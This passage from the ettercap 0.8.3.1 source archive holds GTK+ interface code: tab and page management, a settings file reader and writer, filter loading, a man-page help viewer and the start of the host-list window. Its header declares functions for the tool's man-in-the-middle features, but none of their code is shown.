the resolution process * in the background. * This function periodically recalls this host_iptoa until * a result in available in the cache and updates the widget. */ gboolean gtkui_iptoa_deferred(gpointer data) { struct resolv_object *ro; char name[MAX_HOSTNAME_LEN]; ro = (struct resolv_object *)data; DEBUG_MSG("gtkui_iptoa_deferred"); if (host_iptoa(ro->ip, name) == E_SUCCESS) { /* * Name has now been resolved in the background * Set the widget text and destroy the timer */ if (ro->type == GTK_TYPE_LABEL) gtk_label_set_text(GTK_LABEL(ro->widget), name); else if (ro->type == GTK_TYPE_LIST_STORE) gtk_list_store_set(GTK_LIST_STORE(ro->liststore), &ro->treeiter, ro->column, name, -1); /* Free allocated memory */ SAFE_FREE(ro); /* destroy timer */ return FALSE; } else { /* Keep trying */ return TRUE; } } /* hitting "Enter" keyy in a combo box does the same as clicking OK button */ gboolean gtkui_combo_enter(GtkWidget *widget, GdkEventKey *event, gpointer data) { GtkWidget *dialog; /* variable not used */ (void) data; if (event->keyval == GDK_KEY_Return) { dialog = g_object_get_data(G_OBJECT(widget), "dialog"); gtk_dialog_response(GTK_DIALOG (dialog), GTK_RESPONSE_OK); return TRUE; } return FALSE; } /* hitting "Enter" key in dialog does same as clicking OK button */ void gtkui_dialog_enter(GtkWidget *widget, gpointer data) { GtkWidget *dialog; /* variable not used */ (void) data; dialog = g_object_get_data(G_OBJECT(widget), "dialog"); gtk_dialog_response(GTK_DIALOG (dialog), GTK_RESPONSE_OK); } /* create a new notebook (tab) page */ /* returns a parent widget to pack the contents of the page into */ GtkWidget *gtkui_page_new(char *title, void (*callback)(void), void (*detacher)(GtkWidget *)) { GtkWidget *parent, *label; GtkWidget *hbox, *button, *image; /* a container to hold the close button and tab label */ hbox = gtkui_box_new(GTK_ORIENTATION_HORIZONTAL, 0, FALSE); gtk_widget_show(hbox); /* the label for the tab title */ label = gtk_label_new(title); gtk_box_pack_start(GTK_BOX(hbox), label, TRUE, TRUE, 0); gtk_widget_show(label); /* the close button */ button = gtk_button_new(); gtk_button_set_relief(GTK_BUTTON (button), GTK_RELIEF_NONE); gtk_box_pack_start(GTK_BOX(hbox), button, FALSE, FALSE, 0); gtk_widget_set_size_request(button, 20, 20); gtk_widget_show(button); /* an image for the button */ image = gtk_image_new_from_stock (GTK_STOCK_CLOSE, GTK_ICON_SIZE_MENU); gtk_container_add(GTK_CONTAINER (button), image); gtk_widget_show(image); /* a parent to pack the contents into */ parent = gtk_frame_new(NULL); gtk_frame_set_shadow_type(GTK_FRAME(parent), GTK_SHADOW_NONE); gtk_widget_show(parent); if(!notebook && notebook_frame) { gtk_container_remove(GTK_CONTAINER (notebook_frame), gtk_bin_get_child(GTK_BIN (notebook_frame))); notebook = gtk_notebook_new(); gtk_notebook_set_tab_pos(GTK_NOTEBOOK (notebook), GTK_POS_TOP); gtk_notebook_set_scrollable(GTK_NOTEBOOK (notebook), TRUE); gtk_container_add(GTK_CONTAINER (notebook_frame), notebook); gtk_widget_show(notebook); #if GTK_MINOR_VERSION == 2 g_signal_connect(G_OBJECT (notebook), "switch-page", G_CALLBACK(gtkui_page_defocus_tabs), NULL); #endif gtkui_create_tab_menu(); } gtk_notebook_append_page(GTK_NOTEBOOK(notebook), parent, hbox); /* attach callback to destroy the tab/page */ g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK(gtkui_page_close), parent); /* attach callback to do specific clean-up */ if(callback) g_object_set_data(G_OBJECT (parent), "destroy", callback); if(detacher) g_object_set_data(G_OBJECT (parent), "detach", detacher); gtkui_page_present(parent); return(parent); } /* show and focus the page containing child */ void gtkui_page_present(GtkWidget *child) { int num = 0; num = gtk_notebook_page_num(GTK_NOTEBOOK (notebook), child); gtk_notebook_set_current_page(GTK_NOTEBOOK (notebook), num); #if GTK_MINOR_VERSION == 2 gtkui_page_defocus_tabs(); #endif } /* defocus tab buttons in notebook (gtk bug work-around */ /* GTK+ 2.0 doesn't have gtk_notebook_get_n_pages and this */ /* bug is fixedin 2.4 so only include this when building on 2.2 */ #if GTK_MINOR_VERSION == 2 static void gtkui_page_defocus_tabs(void) { GList *list = NULL, *curr = NULL; GtkWidget *contents, *label; int pages = 0; /* make sure all the close buttons loose focus */ for(pages = gtk_notebook_get_n_pages(GTK_NOTEBOOK (notebook)); pages > 0; pages--) { contents = gtk_notebook_get_nth_page(GTK_NOTEBOOK (notebook), (pages - 1)); label = gtk_notebook_get_tab_label(GTK_NOTEBOOK (notebook), contents); list = gtk_container_get_children(GTK_CONTAINER (label)); for(curr = list; curr != NULL; curr = curr->next) if(GTK_IS_BUTTON (curr->data)) gtk_button_leave(GTK_BUTTON (curr->data)); } } #endif /* close the page containing the child passed in "data" */ void gtkui_page_close(GtkWidget *widget, gpointer data) { GtkWidget *child; gint num = 0; void (*callback)(void); /* variable not used */ (void) widget; (void) data; DEBUG_MSG("gtkui_page_close"); num = gtk_notebook_page_num(GTK_NOTEBOOK(notebook), GTK_WIDGET (data)); child = gtk_notebook_get_nth_page(GTK_NOTEBOOK(notebook), num); g_object_ref(G_OBJECT(child)); gtk_notebook_remove_page(GTK_NOTEBOOK(notebook), num); callback = g_object_get_data(G_OBJECT (child), "destroy"); if(callback) callback(); } /* close the currently focused notebook page */ void gtkui_page_close_current(void) { GtkWidget *child; gint num = 0; num = gtk_notebook_get_current_page(GTK_NOTEBOOK (notebook)); child = gtk_notebook_get_nth_page(GTK_NOTEBOOK(notebook), num); gtkui_page_close(NULL, child); } /* show the context menu when the notebook tabs receive a mouse right-click */ gboolean gtkui_context_menu(GtkWidget *widget, GdkEventButton *event, gpointer data) { /* variable not used */ (void) widget; if(event->button == 3) { gtk_menu_popup(GTK_MENU(data), NULL, NULL, NULL, NULL, 3, event->time); /* * button press event handle must return TRUE to keep the selection * active when pressing the mouse button */ return TRUE; } return FALSE; } /* detach the currently focused notebook page into a free window */ void gtkui_page_detach_current(void) { void (*detacher)(GtkWidget *); GtkWidget *child; gint num = 0; num = gtk_notebook_get_current_page(GTK_NOTEBOOK (notebook)); if(num < 0) return; child = gtk_notebook_get_nth_page(GTK_NOTEBOOK(notebook), num); g_object_ref(G_OBJECT(child)); gtk_notebook_remove_page(GTK_NOTEBOOK(notebook), num); detacher = g_object_get_data(G_OBJECT (child), "detach"); if(detacher) detacher(child); } void gtkui_page_attach_shortcut(GtkWidget *win, void (*attacher)(void)) { GtkAccelGroup *accel; GClosure *closure = NULL; GdkModifierType mods; gint keyval; accel = gtk_accel_group_new (); gtk_window_add_accel_group(GTK_WINDOW (win), accel); closure = g_cclosure_new(G_CALLBACK(attacher), NULL, NULL); gtk_accelerator_parse ("D", &keyval, &mods); gtk_accel_group_connect(accel, keyval, mods, 0, closure); } /* change view and focus to the next notebook page */ void gtkui_page_right(void) { gtk_notebook_next_page(GTK_NOTEBOOK (notebook)); } /* change view and focus to previous notebook page */ void gtkui_page_left(void) { gtk_notebook_prev_page(GTK_NOTEBOOK (notebook)); } /* for connecting to browse buttons, pass entry widget as callback "data" */ void gtkui_filename_browse(GtkWidget *widget, gpointer data) { GtkWidget *dialog = NULL; gint response = 0; const char *filename = NULL; /* variable not used */ (void) widget; dialog = gtk_file_chooser_dialog_new("Select a file...", NULL, GTK_FILE_CHOOSER_ACTION_OPEN, GTK_STOCK_CANCEL, GTK_RESPONSE_CANCEL, GTK_STOCK_OK, GTK_RESPONSE_OK, NULL); response = gtk_dialog_run (GTK_DIALOG (dialog)); if (response == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); filename = gtk_file_chooser_get_filename(GTK_FILE_CHOOSER(dialog)); gtk_entry_set_text(GTK_ENTRY (data), filename); } gtk_widget_destroy(dialog); } /* make sure data is valid UTF8 */ char *gtkui_utf8_validate(char *data) { const gchar *end; char *unicode = NULL; unicode = data; if(!g_utf8_validate (data, -1, &end)) { /* if "end" pointer is at beginning of string, we have no valid text to print */ if(end == unicode) return(NULL); /* cut off the invalid part so we don't lose the whole string */ /* this shouldn't happen often */ unicode = (char *)end; *unicode = 0; unicode = data; } return(unicode); } GtkWidget *gtkui_box_new(gint orientation, gint spacing, gboolean homogenious) { #if GTK_CHECK_VERSION(3, 0, 0) (void) homogenious; return gtk_box_new(orientation, spacing); #else if (orientation == GTK_ORIENTATION_VERTICAL) return gtk_vbox_new(homogenious, spacing); else return gtk_hbox_new(homogenious, spacing); #endif } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/gtk/ec_gtk.h000664 000000 000000 00000010662 13711276346 020573 0ustar00rootroot000000 000000 #ifndef ETTERCAP_GTK_H #define ETTERCAP_GTK_H #define G_DISABLE_CONST_RETURNS #include #include #define LOGO_FILE "ettercap.png" #define LOGO_FILE_SMALL "ettercap-small.png" #define ICON_FILE "ettercap.svg" #ifndef GTK_WRAP_WORD_CHAR #define GTK_WRAP_WORD_CHAR GTK_WRAP_WORD #endif struct gtk_conf_entry { char *name; short value; }; struct resolv_object { /* Widget type to be updated */ GType type; /* Widget to be updated */ GtkWidget *widget; /* List Stores are not of type GtkWidget */ GtkListStore *liststore; /* some attributes needed to update the widget */ GtkTreeIter treeiter; guint column; /* The IP address to resolve */ struct ip_addr *ip; }; /* ec_gtk.c */ extern GtkWidget *window; /* main window */ extern GtkWidget *notebook; extern GtkWidget *main_menu; extern GtkUIManager *menu_manager; extern guint merge_id; extern GTimer *progress_timer; extern void set_gtk_interface(void); extern void gtkui_about(void); extern void gtkui_message(const char *msg); extern void gtkui_input(const char *title, char *input, size_t n, void (*callback)(void)); extern void gtkui_exit(void); extern void gtkui_sniff_offline(void); extern void gtkui_sniff_live(void); extern gboolean gtkui_iptoa_deferred(gpointer data); extern gboolean gtkui_combo_enter(GtkWidget *widget, GdkEventKey *event, gpointer data); extern void gtkui_dialog_enter(GtkWidget *widget, gpointer data); extern gboolean gtkui_context_menu(GtkWidget *widget, GdkEventButton *event, gpointer data); extern void gtkui_filename_browse(GtkWidget *widget, gpointer data); extern char *gtkui_utf8_validate(char *data); extern GtkWidget *gtkui_box_new(gint orientation, gint spacing, gboolean homogenious); /* MDI pages */ extern GtkWidget *gtkui_page_new(char *title, void (*callback)(void), void (*detacher)(GtkWidget *)); extern void gtkui_page_present(GtkWidget *child); extern void gtkui_page_close(GtkWidget *widget, gpointer data); extern void gtkui_page_close_current(void); extern void gtkui_page_detach_current(void); extern void gtkui_page_attach_shortcut(GtkWidget *win, void (*attacher)(void)); extern void gtkui_page_right(void); extern void gtkui_page_left(void); /* ec_gtk_menus.c */ /* * 0 for offline menus * 1 for live menus */ extern void gtkui_create_menu(int live); extern void gtkui_create_tab_menu(void); /* ec_gtk_start.c */ extern void gtkui_start_sniffing(void); extern void gtkui_stop_sniffing(void); /* ec_gtk_filters.c */ extern void gtkui_load_filter(void); extern void gtkui_stop_filter(void); /* ec_gtk_hosts.c */ #ifdef WITH_IPV6 extern void toggle_ip6scan(void); #endif extern void gtkui_scan(void); extern void gtkui_load_hosts(void); extern void gtkui_save_hosts(void); extern void gtkui_host_list(void); extern gboolean gtkui_refresh_host_list(gpointer data); /* ec_gtk_view.c */ extern void gtkui_show_stats(void); extern void toggle_resolve(void); extern void gtkui_vis_method(void); extern void gtkui_vis_regex(void); extern void gtkui_wifi_key(void); /* ec_gtk_targets.c */ extern void toggle_reverse(void); extern void gtkui_select_protocol(void); extern void wipe_targets(void); extern void gtkui_select_targets(void); extern void gtkui_current_targets(void); extern void gtkui_create_targets_array(void); /* ec_gtk_view_profiles.c */ extern void gtkui_show_profiles(void); /* ec_gtk_mitm.c */ extern void gtkui_arp_poisoning(void); extern void gtkui_icmp_redir(void); extern void gtkui_port_stealing(void); extern void gtkui_dhcp_spoofing(void); #ifdef WITH_IPV6 extern void gtkui_ndp_poisoning(void); #endif extern void gtkui_mitm_stop(void); /* ec_gtk_redirect.c */ extern void gtkui_sslredir_show(void); /* ec_gtk_logging.c */ extern void toggle_compress(void); extern void gtkui_log_all(void); extern void gtkui_log_info(void); extern void gtkui_log_msg(void); extern void gtkui_stop_log(void); extern void gtkui_stop_msg(void); /* ec_gtk_plugins.c */ extern void gtkui_plugin_mgmt(void); extern void gtkui_plugin_load(void); extern gboolean gtkui_refresh_plugin_list(gpointer data); extern gboolean gtkui_plugins_autostart(gpointer data); /* ec_gtk_view_connections.c */ extern void gtkui_show_connections(void); /* ec_gtk_conf.c */ extern void gtkui_conf_set(char *name, short value); extern short gtkui_conf_get(char *name); extern void gtkui_conf_read(void); extern void gtkui_conf_save(void); #ifndef OS_WINDOWS /* ec_gtk_help.c */ extern void gtkui_help(void); #endif #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/gtk/ec_gtk_conf.c000664 000000 000000 00000005105 13711276346 021567 0ustar00rootroot000000 000000 /* ettercap -- GTK+ GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include static char *filename = NULL; static struct gtk_conf_entry settings[] = { { "window_top", 0 }, { "window_left", 0 }, { "window_height", 440 }, { "window_width", 600 }, { NULL, 0 }, }; void gtkui_conf_set(char *name, short value) { short c = 0; DEBUG_MSG("gtkui_conf_set: name=%s value=%hu", name, value); for(c = 0; settings[c].name != NULL; c++) { if(!strcmp(name, settings[c].name)) { settings[c].value = value; break; } } } short gtkui_conf_get(char *name) { unsigned short c = 0; DEBUG_MSG("gtkui_conf_get: name=%s", name); for(c = 0; settings[c].name != NULL; c++) { if(!strcmp(name, settings[c].name)) return(settings[c].value); } return(0); } void gtkui_conf_read(void) { FILE *fd; const char *path; char line[100], name[30]; short value; /* If you launch ettercap using sudo, then the config file is your user config dir */ path = g_get_user_config_dir(); filename = g_build_filename(path, "ettercap_gtk", NULL); DEBUG_MSG("gtkui_conf_read: %s", filename); fd = fopen(filename, "r"); if(!fd) return; while(fgets(line, 100, fd)) { char *p = strchr(line, '='); if(!p) continue; *p = '\0'; strlcpy(name, line, sizeof(name)); g_strstrip(name); value = atoi(p + 1); gtkui_conf_set(name, value); } fclose(fd); } void gtkui_conf_save(void) { FILE *fd; int c; DEBUG_MSG("gtkui_conf_save"); if(!filename) return; fd = fopen(filename, "w"); if(fd != NULL) { for(c = 0; settings[c].name != NULL; c++) fprintf(fd, "%s = %hd\n", settings[c].name, settings[c].value); fclose(fd); } g_free(filename); filename = NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/gtk/ec_gtk_filters.c000664 000000 000000 00000004130 13711276346 022307 0ustar00rootroot000000 000000 /* ettercap -- GTK+ GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include /*******************************************/ /* * display the file open dialog */ void gtkui_load_filter(void) { GtkWidget *dialog; gchar *filename; int response = 0; char *path = get_full_path("share", ""); DEBUG_MSG("gtk_load_filter"); dialog = gtk_file_chooser_dialog_new("Select a precompiled filter file...", GTK_WINDOW(window), GTK_FILE_CHOOSER_ACTION_OPEN, GTK_STOCK_CANCEL, GTK_RESPONSE_CANCEL, GTK_STOCK_OPEN, GTK_RESPONSE_OK, NULL); gtk_file_chooser_set_current_folder(GTK_FILE_CHOOSER(dialog), path); SAFE_FREE(path); response = gtk_dialog_run (GTK_DIALOG (dialog)); if (response == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); filename = gtk_file_chooser_get_filename(GTK_FILE_CHOOSER(dialog)); /* * load the filters chain. * errors are spawned by the function itself */ filter_load_file(filename, EC_GBL_FILTERS, 1); g_free(filename); } gtk_widget_destroy (dialog); } /* * uload the filter chain */ void gtkui_stop_filter(void) { DEBUG_MSG("gtk_stop_filter"); filter_unload(EC_GBL_FILTERS); gtkui_message("Filters were unloaded"); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/gtk/ec_gtk_help.c000664 000000 000000 00000015710 13711276346 021575 0ustar00rootroot000000 000000 /* ettercap -- GTK+ GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #ifndef OS_WINDOWS #include #include #include #include /* globals */ static GtkTreeSelection *selection = NULL; static GtkListStore *liststore = NULL; static GtkTextBuffer *textbuf = NULL; typedef struct { char *title; char *file; } help_pair; help_pair help_list[] = { { "ettercap", "ettercap" }, { "logging", "etterlog" }, { "filters", "etterfilter" }, { "plugins", "ettercap_plugins" }, { "settings", "etter.conf" }, { "curses", "ettercap_curses" }, { NULL, NULL } }; /* proto */ void gtkui_help_open(char *file); void gtkui_help_selected(GtkTreeSelection *treeselection, gpointer data); /********************************************/ void gtkui_help(void) { GtkWidget *dialog, *scrolled, *treeview, *hbox, *textview, *content_area; GtkCellRenderer *renderer; GtkTreeViewColumn *column; GtkTreeIter iter; help_pair *section; DEBUG_MSG("gtkui_help"); dialog = gtk_dialog_new_with_buttons(PROGRAM" Help", GTK_WINDOW (window), GTK_DIALOG_MODAL, GTK_STOCK_CLOSE, GTK_RESPONSE_CLOSE, NULL); gtk_window_set_default_size(GTK_WINDOW (dialog), 780, 580); #if !GTK_CHECK_VERSION(2, 22, 0) // depricated since Gtk 2.22 gtk_dialog_set_has_separator(GTK_DIALOG (dialog), TRUE); #endif gtk_container_set_border_width(GTK_CONTAINER (dialog), 5); hbox = gtkui_box_new(GTK_ORIENTATION_HORIZONTAL, 6, FALSE); content_area = gtk_dialog_get_content_area(GTK_DIALOG(dialog)); gtk_box_pack_start(GTK_BOX(content_area), hbox, TRUE, TRUE, 0); scrolled = gtk_scrolled_window_new(NULL, NULL); gtk_scrolled_window_set_policy(GTK_SCROLLED_WINDOW (scrolled), GTK_POLICY_NEVER, GTK_POLICY_AUTOMATIC); gtk_scrolled_window_set_shadow_type(GTK_SCROLLED_WINDOW (scrolled), GTK_SHADOW_IN); gtk_box_pack_start(GTK_BOX(hbox), scrolled, FALSE, FALSE, 0); gtk_widget_show(scrolled); treeview = gtk_tree_view_new(); gtk_tree_view_set_headers_visible(GTK_TREE_VIEW (treeview), FALSE); gtk_container_add(GTK_CONTAINER (scrolled), treeview); gtk_widget_show(treeview); selection = gtk_tree_view_get_selection (GTK_TREE_VIEW (treeview)); gtk_tree_selection_set_mode (selection, GTK_SELECTION_SINGLE); g_signal_connect(selection, "changed", G_CALLBACK (gtkui_help_selected), liststore); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("Contents", renderer, "text", 0, NULL); gtk_tree_view_column_set_sort_column_id (column, 0); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); liststore = gtk_list_store_new (2, G_TYPE_STRING, G_TYPE_POINTER); for(section = help_list; section->title; section++) { gtk_list_store_append (liststore, &iter); gtk_list_store_set (liststore, &iter, 0, section->title, 1, section->file, -1); } gtk_tree_view_set_model(GTK_TREE_VIEW (treeview), GTK_TREE_MODEL (liststore)); /* text area */ scrolled = gtk_scrolled_window_new(NULL, NULL); gtk_scrolled_window_set_policy(GTK_SCROLLED_WINDOW (scrolled), GTK_POLICY_AUTOMATIC, GTK_POLICY_AUTOMATIC); gtk_scrolled_window_set_shadow_type(GTK_SCROLLED_WINDOW (scrolled), GTK_SHADOW_IN); gtk_box_pack_start(GTK_BOX(hbox), scrolled, TRUE, TRUE, 0); gtk_widget_show(scrolled); textview = gtk_text_view_new(); gtk_text_view_set_editable(GTK_TEXT_VIEW (textview), FALSE); gtk_text_view_set_cursor_visible(GTK_TEXT_VIEW (textview), FALSE); gtk_container_add(GTK_CONTAINER (scrolled), textview); gtk_widget_show(textview); textbuf = gtk_text_view_get_buffer(GTK_TEXT_VIEW (textview)); gtk_widget_show_all(hbox); gtk_dialog_run(GTK_DIALOG (dialog)); gtk_widget_destroy (dialog); } void gtkui_help_open(char *file) { const char *full = "sh -c \"man %s | col -b\""; char *data = NULL, *unicode = NULL, *errors = NULL, *cmd; gboolean ret = FALSE; gint len = 0; len = strlen(file) + strlen(full) +1; cmd = g_malloc(sizeof(char) * len); snprintf(cmd, len, full, file); // try to find the system installed man ret = g_spawn_command_line_sync(cmd, &data, &errors, NULL, NULL); g_free(cmd); if(ret && errors && strlen(errors) > 0) { g_free(errors); // system man not found, try non-standard man(8) installation directory full = "sh -c \"man -M " MAN_INSTALLDIR " %s | col -b\""; len = strlen(file) + strlen(full) +1; cmd = g_malloc(sizeof(char) * len); snprintf(cmd, len, full, file); ret = g_spawn_command_line_sync(cmd, &data, &errors, NULL, NULL); g_free(cmd); if(ret && errors && strlen(errors) > 0) { g_free(errors); // man not found in the man installation directory, try build directory full = "sh -c \"man ./man/%s.8 | col -b\""; len = strlen(file) + strlen(full) +1; cmd = g_malloc(sizeof(char) * len); snprintf(cmd, len, full, file); ret = g_spawn_command_line_sync(cmd, &data, &errors, NULL, NULL); g_free(cmd); if(ret && errors && strlen(errors) > 0) { g_free(errors); // man(8) in the build directory not found, but etter.conf is man(5) full = "sh -c \"man ./man/%s.5 | col -b\""; len = strlen(file) + strlen(full) +1; cmd = g_malloc(sizeof(char) * len); snprintf(cmd, len, full, file); ret = g_spawn_command_line_sync(cmd, &data, &errors, NULL, NULL); g_free(cmd); if(ret && errors && strlen(errors) > 0) { ui_error(errors); g_free(errors); } } } } /* print output of command in help window */ if(data && ret) { if ((unicode = gtkui_utf8_validate(data))) gtk_text_buffer_set_text(textbuf, unicode, -1); g_free(data); } } void gtkui_help_selected(GtkTreeSelection *treeselection, gpointer data) { GtkTreeIter iter; GtkTreeModel *model; gchar *file; /* variable not used */ (void) data; if (gtk_tree_selection_get_selected (GTK_TREE_SELECTION (treeselection), &model, &iter)) { gtk_tree_model_get (model, &iter, 1, &file, -1); if(!file) return; gtkui_help_open(file); } } #endif ettercap-0.8.3.1/src/interfaces/gtk/ec_gtk_hosts.c000664 000000 000000 00000033034 13711276346 022004 0ustar00rootroot000000 000000 /* ettercap -- GTK+ GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* proto */ static void load_hosts(const char *file); static void save_hosts(void); static void gtkui_hosts_destroy(void); static void gtkui_button_callback(GtkWidget *widget, gpointer data); static void gtkui_hosts_detach(GtkWidget *child); static void gtkui_hosts_attach(void); /* globals */ static GtkWidget *hosts_window = NULL; static GtkTreeSelection *selection = NULL; static GtkListStore *liststore = NULL; enum { HOST_DELETE, HOST_TARGET1, HOST_TARGET2 }; /*******************************************/ #ifdef WITH_IPV6 void toggle_ip6scan(void) { if (EC_GBL_OPTIONS->ip6scan) { EC_GBL_OPTIONS->ip6scan = 0; } else { EC_GBL_OPTIONS->ip6scan = 1; } } #endif /* * scan the lan for hosts */ void gtkui_scan(void) { /* no target defined... force a full scan */ if (EC_GBL_TARGET1->all_ip && EC_GBL_TARGET2->all_ip && EC_GBL_TARGET1->all_ip6 && EC_GBL_TARGET2->all_ip6 && !EC_GBL_TARGET1->scan_all && !EC_GBL_TARGET2->scan_all) { EC_GBL_TARGET1->scan_all = 1; EC_GBL_TARGET2->scan_all = 1; } /* perform a new scan */ build_hosts_list(); } /* * display the file open dialog */ void gtkui_load_hosts(void) { GtkWidget *dialog; gchar *filename; int response = 0; DEBUG_MSG("gtk_load_hosts"); dialog = gtk_file_chooser_dialog_new("Select a hosts file...", GTK_WINDOW(window), GTK_FILE_CHOOSER_ACTION_OPEN, GTK_STOCK_CANCEL, GTK_RESPONSE_CANCEL, GTK_STOCK_OPEN, GTK_RESPONSE_OK, NULL); gtk_file_chooser_set_current_folder(GTK_FILE_CHOOSER(dialog), ""); response = gtk_dialog_run (GTK_DIALOG (dialog)); if (response == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); filename = gtk_file_chooser_get_filename(GTK_FILE_CHOOSER(dialog)); load_hosts(filename); gtkui_refresh_host_list(NULL); g_free(filename); } gtk_widget_destroy (dialog); } static void load_hosts(const char *file) { char *tmp; char current[PATH_MAX]; DEBUG_MSG("load_hosts %s", file); SAFE_CALLOC(tmp, strlen(file)+1, sizeof(char)); /* get the current working directory */ getcwd(current, PATH_MAX); /* we are opening a file in the current dir. * use the relative path, so we can open files * in the current dir even if the complete path * is not traversable with ec_uid permissions */ if (!strncmp(current, file, strlen(current))) snprintf(tmp, strlen(file)+1,"./%s", file+strlen(current)); else snprintf(tmp, strlen(file), "%s", file); DEBUG_MSG("load_hosts path == %s", tmp); /* wipe the current list */ del_hosts_list(); /* load the hosts list */ scan_load_hosts(tmp); SAFE_FREE(tmp); gtkui_host_list(); } /* * display the write file menu */ void gtkui_save_hosts(void) { #define FILE_LEN 40 GtkWidget *dialog; gchar *filename; DEBUG_MSG("gtk_save_hosts"); SAFE_FREE(EC_GBL_OPTIONS->hostsfile); SAFE_CALLOC(EC_GBL_OPTIONS->hostsfile, FILE_LEN, sizeof(char)); dialog = gtk_file_chooser_dialog_new("Save hosts to file...", GTK_WINDOW(window), GTK_FILE_CHOOSER_ACTION_SAVE, GTK_STOCK_CANCEL, GTK_RESPONSE_CANCEL, GTK_STOCK_SAVE, GTK_RESPONSE_OK, NULL); gtk_file_chooser_set_current_folder(GTK_FILE_CHOOSER(dialog), "."); if (gtk_dialog_run(GTK_DIALOG(dialog)) == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); filename = gtk_file_chooser_get_filename(GTK_FILE_CHOOSER(dialog)); gtk_widget_destroy(dialog); memcpy(EC_GBL_OPTIONS->hostsfile, filename, FILE_LEN); g_free(filename); save_hosts(); } else { gtk_widget_destroy(dialog); } } static void save_hosts(void) { FILE *f; /* check if the file is writeable */ f = fopen(EC_GBL_OPTIONS->hostsfile, "w"); if (f == NULL) { ui_error("Cannot write %s", EC_GBL_OPTIONS->hostsfile); SAFE_FREE(EC_GBL_OPTIONS->hostsfile); return; } /* if ok, delete it */ fclose(f); unlink(EC_GBL_OPTIONS->hostsfile); scan_save_hosts(EC_GBL_OPTIONS->hostsfile); } /* * display the host list */ void gtkui_host_list(void) { GtkWidget *scrolled, *treeview, *vbox, *hbox, *button, *item, *context_menu; GtkCellRenderer *renderer; GtkTreeViewColumn *column; static gint host_delete = HOST_DELETE; static gint host_target1 = HOST_TARGET1; static gint host_target2 = HOST_TARGET2; DEBUG_MSG("gtk_host_list"); if(hosts_window) { if(GTK_IS_WINDOW (hosts_window)) gtk_window_present(GTK_WINDOW (hosts_window)); else gtkui_page_present(hosts_window); return; } hosts_window = gtkui_page_new("Host List", >kui_hosts_destroy, >kui_hosts_detach); vbox = gtkui_box_new(GTK_ORIENTATION_VERTICAL, 0, FALSE); gtk_container_add(GTK_CONTAINER (hosts_window), vbox); gtk_widget_show(vbox); scrolled = gtk_scrolled_window_new(NULL, NULL); gtk_scrolled_window_set_policy(GTK_SCROLLED_WINDOW (scrolled), GTK_POLICY_AUTOMATIC, GTK_POLICY_AUTOMATIC); gtk_scrolled_window_set_shadow_type(GTK_SCROLLED_WINDOW (scrolled), GTK_SHADOW_IN); gtk_box_pack_start(GTK_BOX(vbox), scrolled, TRUE, TRUE, 0); gtk_widget_show(scrolled); treeview = gtk_tree_view_new(); gtk_container_add(GTK_CONTAINER (scrolled), treeview); gtk_widget_show(treeview); selection = gtk_tree_view_get_selection (GTK_TREE_VIEW (treeview)); gtk_tree_selection_set_mode (selection, GTK_SELECTION_MULTIPLE); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("IP Address", renderer, "text", 0, NULL); gtk_tree_view_column_set_sort_column_id (column, 0); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("MAC Address", renderer, "text", 1, NULL); gtk_tree_view_column_set_sort_column_id (column, 1); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("Description", renderer, "text", 2, NULL); gtk_tree_view_column_set_sort_column_id (column, 2); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); /* populate the list or at least allocate a spot for it */ gtkui_refresh_host_list(NULL); /* set the elements */ gtk_tree_view_set_model(GTK_TREE_VIEW (treeview), GTK_TREE_MODEL (liststore)); hbox = gtkui_box_new(GTK_ORIENTATION_HORIZONTAL, 0, TRUE); gtk_box_pack_start(GTK_BOX (vbox), hbox, FALSE, FALSE, 0); gtk_widget_show(hbox); 